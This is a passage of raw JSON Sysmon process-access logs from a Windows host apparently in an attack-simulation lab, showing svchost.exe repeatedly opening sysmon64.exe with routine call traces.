C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:20.458","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:20.458\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 